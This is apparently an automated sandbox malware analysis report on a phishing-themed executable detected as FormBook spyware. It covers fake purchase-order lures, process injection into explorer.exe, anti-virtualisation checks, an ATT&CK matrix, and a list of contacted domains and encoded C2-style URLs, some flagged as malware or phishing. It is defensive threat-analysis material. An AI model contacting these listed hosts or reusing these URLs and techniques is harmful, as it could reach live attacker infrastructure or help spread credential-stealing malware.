        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Shared Modules        		Path Interception612
        Process Injection        		1
        Masquerading        		OS Credential Dumping221
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Disable or Modify Tools        		LSASS Memory2
        Process Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion        		Security Account Manager31
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
        Process Injection        		NTDS1
        Remote System Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer13
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets112
        System Information Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common4
        Obfuscated Files or Information        		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        Rundll32        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job13
        Software Packing        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
        File Deletion        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 633628 Sample: PO-INQUIRY-VALE-SP-2022-60.exe Startdate: 25/05/2022 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 8 other signatures 2->42 10 PO-INQUIRY-VALE-SP-2022-60.exe 3 2->10         started        process3 file4 28 C:\...\PO-INQUIRY-VALE-SP-2022-60.exe.log, ASCII 10->28 dropped 56 Tries to detect virtualization through RDTSC time measurements 10->56 58 Injects a PE file into a foreign processes 10->58 14 PO-INQUIRY-VALE-SP-2022-60.exe 10->14         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.iguaym.com 156.226.250.150, 49796, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 17->30 32 deta-hedman.com 37.97.135.188, 49790, 80 TRANSIP-ASAmsterdamtheNetherlandsNL Netherlands 17->32 34 31 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Performs DNS queries to domains with low reputation 17->46 21 rundll32.exe 17->21         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PO-INQUIRY-VALE-SP-2022-60.exe18%ReversingLabsByteCode-MSIL.Spyware.Noon
        PO-INQUIRY-VALE-SP-2022-60.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.theminercrypto.com/j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuh0%Avira URL Cloudsafe
        http://www.tiro.comnt0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.shantellonlineshoph.com/j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfT100%Avira URL Cloudmalware
        http://www.lingmao08.com/j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh100%Avira URL Cloudphishing
        www.jupiter-directory.info/j86w/100%Avira URL Cloudmalware
        http://www.pieprop.com/j86w/?r0DdqnX=YaH7gYIDTqY4cEQIM97hHwWq2XV+liDGv7Lmousy66vButcLOjPrknKPAsD+A1J6Q9LI&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.combute0%Avira URL Cloudsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.medicaleducationbangladesh.com/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=NReRvsvJRfGWlTK0vxyHeO9Y7SNAAXczgujBnihGKczK6Cn0FpBEGF9o5XqAzRdHptoj0%Avira URL Cloudsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.sajatypeworks.comal10%Avira URL Cloudsafe
        http://www.tsreaur.com/j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.danilhodoekhi.com/j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.popcornpor.xyz/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm100%Avira URL Cloudphishing
        http://www.jamiebakes.net/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R0%Avira URL Cloudsafe
